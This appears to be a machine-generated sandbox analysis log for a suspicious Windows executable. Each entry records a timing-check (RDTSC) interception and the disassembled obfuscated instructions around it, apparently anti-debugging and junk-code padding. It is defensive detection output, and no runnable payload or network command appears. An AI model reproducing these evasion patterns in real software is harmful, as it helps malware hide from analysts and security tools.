Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 883465 second address: 883469 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 883716 second address: 88374F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A54h 0x00000007 jp 00007FBF8C4F2A46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FBF8C4F2A57h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8838A3 second address: 8838B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007FBF8C4F2086h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8838B0 second address: 8838D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FBF8C4F2A53h 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 jno 00007FBF8C4F2A46h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 883BC8 second address: 883BCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 883BCC second address: 883BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF8C4F2A4Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f popad 0x00000010 jc 00007FBF8C4F2A8Bh 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 883BF0 second address: 883C25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2095h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007FBF8C4F2086h 0x00000011 jmp 00007FBF8C4F2094h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 883D6E second address: 883DAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007FBF8C4F2A4Ch 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jmp 00007FBF8C4F2A57h 0x0000001a pop esi 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 883F3B second address: 883F59 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBF8C4F2086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007FBF8C4F208Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 jg 00007FBF8C4F2086h 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 884589 second address: 8845A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FBF8C4F2A56h 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8845A5 second address: 8845C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F208Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b jmp 00007FBF8C4F208Dh 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8845C8 second address: 8845D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FBF8C4F2A46h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8845D2 second address: 8845DC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBF8C4F2086h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 884747 second address: 88477E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBF8C4F2A46h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FBF8C4F2A53h 0x00000014 jmp 00007FBF8C4F2A55h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 884A45 second address: 884A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 88640C second address: 886410 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 886410 second address: 886419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 889538 second address: 88953C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 88953C second address: 889549 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBF8C4F2086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 888667 second address: 88866D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 88866D second address: 888671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 888671 second address: 888675 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 889737 second address: 88973B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 88973B second address: 88973F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 88973F second address: 889745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 889745 second address: 88976E instructions: 0x00000000 rdtsc 0x00000002 js 00007FBF8C4F2A4Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FBF8C4F2A4Ah 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push ecx 0x00000015 pushad 0x00000016 jp 00007FBF8C4F2A46h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 88976E second address: 889782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 jne 00007FBF8C4F2088h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 889782 second address: 889788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 889788 second address: 88979C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FBF8C4F2088h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 88F0E9 second address: 88F0ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 88F0ED second address: 88F0F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 88F0F1 second address: 88F0F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 88F0F7 second address: 88F109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jp 00007FBF8C4F2086h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 88F6A1 second address: 88F6B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jne 00007FBF8C4F2A4Eh 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 88F6B7 second address: 88F6BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 88F7EB second address: 88F7F0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 88F7F0 second address: 88F825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FBF8C4F2086h 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007FBF8C4F2090h 0x00000015 push esi 0x00000016 pop esi 0x00000017 popad 0x00000018 jbe 00007FBF8C4F2092h 0x0000001e jmp 00007FBF8C4F208Ch 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 893653 second address: 893657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 893657 second address: 89367E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2094h 0x00000007 js 00007FBF8C4F2086h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jns 00007FBF8C4F2086h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 89367E second address: 8936B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jnc 00007FBF8C4F2A46h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FBF8C4F2A57h 0x0000001a jne 00007FBF8C4F2A46h 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 85158D second address: 851591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 851591 second address: 85159B instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBF8C4F2A4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 85159B second address: 8515B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 jmp 00007FBF8C4F208Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 893F98 second address: 893F9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 893F9C second address: 893FA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 893FA0 second address: 893FA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 893FA6 second address: 893FAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 894229 second address: 89422F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8942D0 second address: 8942DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8942DE second address: 8942E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 894445 second address: 894469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FBF8C4F208Ch 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007FBF8C4F208Eh 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8948E0 second address: 8948F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8948F7 second address: 8948FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8948FB second address: 89490D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007FBF8C4F2A48h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 894B23 second address: 894B30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 894B30 second address: 894B4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF8C4F2A58h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 894EA4 second address: 894EAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 896DFC second address: 896E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 mov esi, dword ptr [ebp+122D2B03h] 0x0000000f push 00000000h 0x00000011 sub dword ptr [ebp+12468848h], esi 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007FBF8C4F2A48h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 mov dword ptr [ebp+122D24B1h], eax 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e je 00007FBF8C4F2A46h 0x00000044 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 896E43 second address: 896E4D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBF8C4F2086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8979F6 second address: 8979FB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8979FB second address: 897A1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jc 00007FBF8C4F2088h 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FBF8C4F208Dh 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 897A1B second address: 897A1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 898394 second address: 898399 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 898399 second address: 8983B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF8C4F2A4Eh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007FBF8C4F2A4Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8977AA second address: 8977AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8977AE second address: 8977BC instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBF8C4F2A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 898F2A second address: 898F2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 89A631 second address: 89A651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 pushad 0x00000007 jno 00007FBF8C4F2A51h 0x0000000d jnc 00007FBF8C4F2A4Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 89C128 second address: 89C142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FBF8C4F2086h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push edx 0x00000012 pop edx 0x00000013 jl 00007FBF8C4F2086h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 89C142 second address: 89C161 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF8C4F2A54h 0x00000008 jnp 00007FBF8C4F2A46h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 89DCDD second address: 89DCF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2090h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 89DCF8 second address: 89DCFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 89DCFC second address: 89DD00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 89DD00 second address: 89DD06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 89E258 second address: 89E25C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A02D2 second address: 8A0325 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jmp 00007FBF8C4F2A56h 0x0000000d nop 0x0000000e je 00007FBF8C4F2A4Ch 0x00000014 mov ebx, dword ptr [ebp+122D2C2Bh] 0x0000001a push 00000000h 0x0000001c mov edi, dword ptr [ebp+122D2C33h] 0x00000022 push 00000000h 0x00000024 movsx ebx, di 0x00000027 call 00007FBF8C4F2A4Ch 0x0000002c add bl, FFFFFF85h 0x0000002f pop edi 0x00000030 push eax 0x00000031 pushad 0x00000032 pushad 0x00000033 jns 00007FBF8C4F2A46h 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A142E second address: 8A1432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A34BE second address: 8A34DB instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBF8C4F2A52h 0x00000008 jmp 00007FBF8C4F2A4Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A34DB second address: 8A34E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A34E1 second address: 8A34E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A34E5 second address: 8A3566 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBF8C4F2086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d call 00007FBF8C4F2097h 0x00000012 mov dword ptr [ebp+122D1B3Bh], edi 0x00000018 pop ebx 0x00000019 push 00000000h 0x0000001b mov bl, F2h 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push edx 0x00000022 call 00007FBF8C4F2088h 0x00000027 pop edx 0x00000028 mov dword ptr [esp+04h], edx 0x0000002c add dword ptr [esp+04h], 0000001Bh 0x00000034 inc edx 0x00000035 push edx 0x00000036 ret 0x00000037 pop edx 0x00000038 ret 0x00000039 xchg eax, esi 0x0000003a jmp 00007FBF8C4F2099h 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FBF8C4F2090h 0x00000047 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A54B4 second address: 8A54C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF8C4F2A51h 0x00000009 rdtsc
